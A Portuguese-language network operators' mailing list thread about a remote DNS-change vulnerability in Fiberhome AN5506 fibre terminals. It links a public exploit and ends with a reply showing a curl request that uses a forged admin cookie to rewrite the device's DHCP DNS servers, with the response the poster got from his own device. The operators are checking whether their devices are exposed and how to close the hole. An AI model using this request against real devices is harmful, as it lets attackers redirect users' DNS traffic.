[GTER] RES: Vulnerabilidade Onu Fiberhome (AN5506)

Sat May 19 17:01:52 -03 2018

Aparentemente a vulnerabilidade não afeta a versão RP2643, a qual testei
agora, numa onu AN5506-04-F, o retorno do curl foi o abaixo

christian at noc:~$ curl 'http://X.X.X.X/goform/setDhcp' -H 'Cookie:
loginName=admin' -H --data
'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=5.5.5.5&dhcpSecDns=5.5.5.6&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text='
--compressed -k -i
HTTP/1.0 302 Redirect
Server: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.4.2-OPEN
Date: Sat May 19 16:59:47 2018
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://X.X.X.X/return2login.asp

<html><head></head><body>
This document has moved to a new <a href="http://X.X.X.X/return2login.asp
">location</a>.
Please update your documents to reflect the new location.
</body></html>

curl: (6) Could not resolve host:
dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=5.5.5.5&dhcpSecDns=5.5.5.6&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_t

Em sáb, 19 de mai de 2018 às 13:54, Rubens Marins Schner <
rubens.marins at gmail.com> escreveu:

> Isso pode ser facilmente resolvido desabilitando a gerência local da ONU.
> Não permitindo mais acesso via http ou telnet.
>
> Você pode desabilitar globalmente para toda a OLT ou para ONU/Slot
> específico.
>
>
> On Fri, 18 May 2018 at 20:14 Bruno Viviani <bruno at semprenet.com.br> wrote:
>
> >  #  Software Version RP2617
> > #  Device Model AN5506-04-F
> >
> >
> > att,
> > Bruno Viviani
> >
> >
> > Em 18 de maio de 2018 19:26, Provedor SC <provedorscsul at gmail.com>
> > escreveu:
> >
> > > No link fala do modelo Model AN5506-04-F ou estou errado?
> > >
> > > Enviado do Email para Windows 10
> > >
> > > De: Carlos Luigi
> > > Enviado:sexta-feira, 18 de maio de 2018 19:18
> > > Para: Grupo de Trabalho de Engenharia e Operacao de Redes
> > > Assunto: [GTER] Vulnerabilidade Onu Fiberhome (AN5506)
> > >
> > > Prezados,
> > > Não sei até onde pode afetar alguns, mas foi reportado que nas ONU da
> > > Fiberhome modelo AN5506 (aquelas branquinhas de 1 porta), o invasor
> pode
> > > fazer "Remote DNS Change"(altera DNS do Dhcp para DNS Malicioso do
> > > invasor). essa vulnerabilidades é afetado quando usa a ONU operando
> "modo
> > > wan".
> > >
> > > Ai você pensa logo de cara, "Minhas portas de gerencia é bloqueado
> > > externo... " ok.... mas existe malware rodando em javascript que age
> pelo
> > > lado da rede interna do cliente, quando cliente por exemplo acessa uma
> > > pagina infectada.. (créditos Alan Gregory)
> > >
> > > link do exploit:
> > > https://www.exploit-db.com/exploits/43961/
> > >
> > > Uma thred de outra lista onde alguns já está sintomas de possível
> > invasão:
> > > http://conectlan.com/pipermail/fiberhome_conectlan.
> > > com/2018-January/016708.html
> > >
> > > *Atenciosamente,*
> > >
> > > *Carlos Luigi*
> > >
> > >
> > > *Network Manager*atendimento.co
> > > teste.pro
> > > <http://noc.tools>
> > >  <http://noc.tools>
> > > noc.tools
> > > --
> > > gter list    https://eng.registro.br/mailman/listinfo/gter
> > >
> > > --
> > > gter list    https://eng.registro.br/mailman/listinfo/gter
> > >
> > --
> > gter list    https://eng.registro.br/mailman/listinfo/gter
> >
> --
> Rubens Marins
> Administrador de Sistemas
> rubens.marins at gmail dot com
> --
> gter list    https://eng.registro.br/mailman/listinfo/gter
>

-- 
_______________________________________________________

Christian David Moura de Freitas
Técnico em tecnologia na informação (Desenvolvimento Web e Redes de
computadores)
Graduando Ciência da Computação pela UERN